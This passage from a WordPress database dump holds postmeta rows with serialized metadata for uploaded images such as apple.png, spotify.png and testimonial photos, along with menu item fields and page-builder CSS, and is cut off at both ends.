58-PM-768x1044.png\";s:5:\"width\";i:768;s:6:\"height\";i:1044;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-784x500.png\";s:5:\"width\";i:784;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-784x380.png\";s:5:\"width\";i:784;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-450x612.png\";s:5:\"width\";i:450;s:6:\"height\";i:612;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2020-10-28-at-6.38.58-PM-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1547,2083,'_wp_attached_file','2020/10/apple.png'),(1548,2083,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:141;s:4:\"file\";s:17:\"2020/10/apple.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"apple-300x106.png\";s:5:\"width\";i:300;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"apple-150x141.png\";s:5:\"width\";i:150;s:6:\"height\";i:141;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"apple-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1549,2084,'_wp_attached_file','2020/10/spotify-e1603929385824.png'),(1550,2084,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1101;s:6:\"height\";i:414;s:4:\"file\";s:34:\"2020/10/spotify-e1603929385824.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"spotify-e1603929385824-1024x385.png\";s:5:\"width\";i:1024;s:6:\"height\";i:385;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-768x289.png\";s:5:\"width\";i:768;s:6:\"height\";i:289;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"spotify-1170x494.png\";s:5:\"width\";i:1170;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-880x331.png\";s:5:\"width\";i:880;s:6:\"height\";i:331;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-450x169.png\";s:5:\"width\";i:450;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:34:\"spotify-e1603929385824-450x414.png\";s:5:\"width\";i:450;s:6:\"height\";i:414;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1551,2084,'_edit_lock','1603929263:1'),(1552,2084,'_wp_attachment_backup_sizes','a:12:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1200;s:6:\"height\";i:494;s:4:\"file\";s:11:\"spotify.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:19:\"spotify-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:19:\"spotify-300x124.png\";s:5:\"width\";i:300;s:6:\"height\";i:124;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:19:\"spotify-768x316.png\";s:5:\"width\";i:768;s:6:\"height\";i:316;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:20:\"spotify-1024x422.png\";s:5:\"width\";i:1024;s:6:\"height\";i:422;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:19:\"spotify-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:24:\"fullwidth-landscape-orig\";a:4:{s:4:\"file\";s:20:\"spotify-1170x494.png\";s:5:\"width\";i:1170;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:22:\"sidebar-landscape-orig\";a:4:{s:4:\"file\";s:19:\"spotify-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-auto-orig\";a:4:{s:4:\"file\";s:19:\"spotify-880x362.png\";s:5:\"width\";i:880;s:6:\"height\";i:362;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"portfolio-square-orig\";a:4:{s:4:\"file\";s:19:\"spotify-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"portfolio-auto-orig\";a:4:{s:4:\"file\";s:19:\"spotify-450x185.png\";s:5:\"width\";i:450;s:6:\"height\";i:185;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"square-orig\";a:4:{s:4:\"file\";s:19:\"spotify-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}'),(1553,2084,'_edit_last','1'),(1554,2084,'_wp_page_template','default'),(1555,2085,'_wpb_shortcodes_custom_css','.vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}.vc_custom_1603924201644{background-color: #ffffff !important;}.vc_custom_1603929402169{padding-top: 40px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1603924765880{margin-bottom: -250px !important;}'),(1556,2086,'_menu_item_type','post_type'),(1557,2086,'_menu_item_menu_item_parent','0'),(1558,2086,'_menu_item_object_id','2073'),(1559,2086,'_menu_item_object','page'),(1560,2086,'_menu_item_target',''),(1561,2086,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1562,2086,'_menu_item_xfn',''),(1563,2086,'_menu_item_url',''),(1565,2086,'_wp_old_date','2020-10-28'),(1568,2088,'_wp_attached_file','2020/10/testimonial-3.jpeg'),(1569,2088,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:825;s:6:\"height\";i:449;s:4:\"file\";s:26:\"2020/10/testimonial-3.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"testimonial-3-300x163.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonial-3-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"testimonial-3-768x418.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonial-3-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:26:\"testimonial-3-825x380.jpeg\";s:5:\"width\";i:825;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:26:\"testimonial-3-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:26:\"testimonial-3-450x245.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:26:\"testimonial-3-450x449.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1570,2089,'_wp_attached_file','2020/10/testimonial-2.jpeg'),(1571,2089,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:459;s:4:\"file\";s:26:\"2020/10/testimonial-2.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"testimonial-2-300x166.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonial-2-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"testimonial-2-768x426.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonial-2-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:26:\"testimonial-2-828x380.jpeg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:26:\"testimonial-2-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:26:\"testimonial-2-450x249.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:249;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:26:\"testimonial-2-450x450.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1572,2090,'_wp_attached_file','2020/10/testimonial-1.jpeg'),(1573,2090,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:459;s:4:\"file\";s:26:\"2020/10/testimonial-1.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"testimonial-1-300x166.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonial-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"testimonial-1-768x426.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"testimonial-1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:26:\"testimonial-1-828x380.jpeg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:26:\"testimonial-1-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:26:\"testimonial-1-450x249.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:249;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:26:\"testimonial-1-450x450.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1574,2091,'_wp_attached_file','2020/10/testimonial-1-1.jpeg'),(1575,2091,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:459;s:4:\"file\";s:28:\"2020/10/testimonial-1-1.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-300x166.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-768x426.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-828x380.jpeg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-450x249.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:249;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:28:\"testimonial-1-1-450x450.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1576,2092,'_wp_attached_file','2020/10/testimonial-2-1.jpeg'),(1577,2092,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:459;s:4:\"file\";s:28:\"2020/10/testimonial-2-1.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-300x166.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-768x426.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-828x380.jpeg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-450x249.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:249;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:28:\"testimonial-2-1-450x450.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1578,2093,'_wp_attached_file','2020/10/testimonial-3-1.jpeg'),(1579,2093,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:825;s:6:\"height\";i:449;s:4:\"file\";s:28:\"2020/10/testimonial-3-1.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-300x163.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-768x418.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-825x380.jpeg\";s:5:\"width\";i:825;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-450x245.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:28:\"testimonial-3-1-450x449.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1580,2094,'_wp_attached_file','2020/10/testimonial-4-1.jpg'),(1581,2094,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:451;s:4:\"file\";s:27:\"2020/10/testimonial-4-1.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-768x418.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-828x380.jpg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-450x245.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:27:\"testimonial-4-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1582,2095,'_wp_attached_file','2020/10/test.jpeg'),(1583,2095,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:445;s:4:\"file\";s:17:\"2020/10/test.jpeg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"test-300x161.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"test-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"test-768x413.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"test-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"test-828x380.jpeg\";s:5:\"width\";i:828;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"test-450x350.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"test-450x242.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:242;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"test-450x445.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1584,2096,'_wpb_shortcodes_custom_css','.vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}.vc_custom_1603929990399{padding-top: 30px !important;background-color: #000000 !important;}.vc_custom_1603924201644{background-color: #ffffff !important;}.vc_custom_1603929402169{padding-top: 40px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1603924765880{margin-bottom: -250px 